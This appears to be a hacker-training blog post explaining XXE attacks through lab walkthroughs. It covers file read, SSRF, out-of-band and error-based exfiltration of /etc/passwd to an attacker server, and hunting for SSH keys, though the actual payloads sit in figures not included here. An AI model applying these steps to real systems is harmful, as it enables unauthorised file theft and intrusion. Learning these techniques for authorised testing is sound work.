OWASP Top 10 XXE (or taking liberties with acronyms)
As in my article on Command Injection the aim of this post is to consolidate my knowledge on an issue in the OWASP Top 10 and add to it as I learn more so I have a constantly expanding reference guide and hopefully help out anyone who stumbles across this.
- Injection
- Broken Authentication
- Sensitive Data Exposure
- XXE
- Broken Access Control
- Security Misconfiguration
- XSS
- Insecure Deserialisation
- Using Components With Known Vulnerabilities
- Insufficient Logging and Monitoring
This post is going to focus on number 4 on the list XML External Entity more commonly known as XXE.
XXE
Impact: 8 Risk: 7 Difficulty: 3
So what is an XXE?
XXE is a little inceptionesque when it comes to naming. XXE stands for XML External Entity but the acronym within the acronym XML stands for Extensible Markup Language. Apart from playing fast and loose with E’s and X’s in acronyms its pretty obvious even to the most technophobic of readers that as it suggests XML is a mark up language.
XML uses tags like HTML only instead of boring h2s and ps the tags are user defined. Anyway you can all look in wikipedia so i think we have reached the recommended daily dose of what XML does except to say that it is a language that web sites use to structure the information they hold.
An example of an XML document can be seen below in Figure 1.
To understand XXE you must first understand Document Type Definition (DTD) files. These define the structure of the XML file. DTD files can be internal or external, that is they can be defined within the XML file or reference one at a given external location.
DTDs hold entities and the entities can call system commands. And there in lies our vulnerability. This means that by injecting into an XML document you can change what the system call does. For example we can make the XML ask to provide information from the server or connect to our malicious server. Never trust a user. If this all sounds overly complicated the examples below should clear it all up.
Pre-warning - this article contains spoliers for the Portswigger’s Web Academy’s XXE labs and Hack the Box retired DevOops box.
Types of XXE
Types of XXE attack are:
- XXE with LFI
- XXE with SSRF
- XXE to exfiltrate data out of band
To cover each of these we will work through the labs available on PortSwiggers Web Academy.
XXE with LFI
The Web academy sets up a simple site that uses XML documents to check stock levels. Figure 2 shows the intended request and response in Burp Suite.
Figure 2 shows the altered request and the reponse showing the details of the requested file.
To come back to explanation of an XXE the external entity is the &xxe that is defined and then called later on in the document and thus injected into the server.
With the addition of the line DOCTYPE line to declare the xxe external entity and then calling it in the product id it responds with the requested file. From there follow the instructions in my LFI to find interesting files and see if you can escalate.
XXE with SSRF
This time the same site can be exploited by adding the following http request in place of the file.
With this you are able to access another mahcine on the network (SSRF article coming soon) or your own malicious site to extract files from the server if the way above doesnt work.
If you get no response on the LFI and SSRF it doesn’t always mean it isn’t vulnerable. If you use a canary token or your own web server you can try connecting back (similar syntax as SSRF) to that and see if you can attach a file in the parameters.
OOB
For this we need to define an external DTD in order for the exploit to work. The first part of the image below is the external DTD that you host on your attacking system and the second part s the request you send to your target.
The attack follows the following stages:
- POST request with the above body sent to the target server
- If vulnerable the XML in the requests instructs the server to access the attacker-webserver to request the external DTD which it sends back to the target server
- GET request with appended requested /etc/passwd file sent to the attacker-webserver which can be found in the logs.
These should cause DNS and HTTP requests to your webserver if yo recieve one and not the other further debugging may be required. For example this article which uses a file upload on the site to host a DTD.
Error Based
As an alternate option if faced with a blind exploit you can attempt to get the sensitive files via a error based response that will send your requested file to your attacking server. Using this method you would request the document you wish to read and then one that does not exist.
This first image shows the external DTD that you host on your server or upload etc
And this one is the request to execute it
Of course in some cases the firewalls arent going to allow this and in those cases you can attempt to access a DTD on the webserver already. This article lists various ways to exploit a target if it has access to a known DTD. An example can be seen below using this method:
How do I find XXE?
XXE should be tested anywhere an xml document is submitted. Although the examples below are oversimplified examples in the real world the xml is likely to have a lot of objects and each of them must be tested. On different sites XML can be produced for different reasons. Once your recon of a site is complete check you burp logs for any xml documents being sent to the server and give them a try.
Keep an eye out for Content-Type: application/xml in requests.
But everything is JSON these days, well its still possible to convert the JSON to XML and attempt the exploit. Convert with an online tool and change the content type to the above and it might sneak through. For more details on this, see this great article
Another place to look for XXE is in File Uploads. If you cant manage to upload a reverse shell sometimes these file uploads accept XML documents. The example below is from Hack The Box DevOops and shows an LFI being executed through an XML file upload.
Now we know the users on the system and their home directories we can check for SSH keys as seen below.
Payloads
A list of all the XXE payloads you could possibly want are available on payloads all the things GitHub.
Examples in Hack The Box
For those wishing to practice XXE there are example on DVWA and Juice Shop as well as the below retired Hack the Box machines:
- Aragog
- Fulcrum
- DevOOPs
Prevention
Disable any unused XML parsing features that could be used by attackers to run XXE in particular resolution of external entities and support for XInclude
Disclaimer
As with all of these types of techniques these methods should only be used against systems you own or those you have express and written permission of the owner to test. It is illegal to use these techniques on systems in other cases.
Conclusion
This has been a brief over view of how to find and exploit XXE. The combination of the Web Academy and Hack the Box should be sufficient to get your head around this topic and then its just a case of expanding this to bigger documents in the wild. Check back from time to time as I will be adding new content to this page and others as I discover more things. XXEs most commonly result in the ability to read files on the system which can potentially be escalated or to connect to internal networks and services or an external malicious host.
Any comments or questions please contact me on twitter at the link at the top of the page.
Subscribe to Hacker Street
Get the latest posts delivered right to your inbox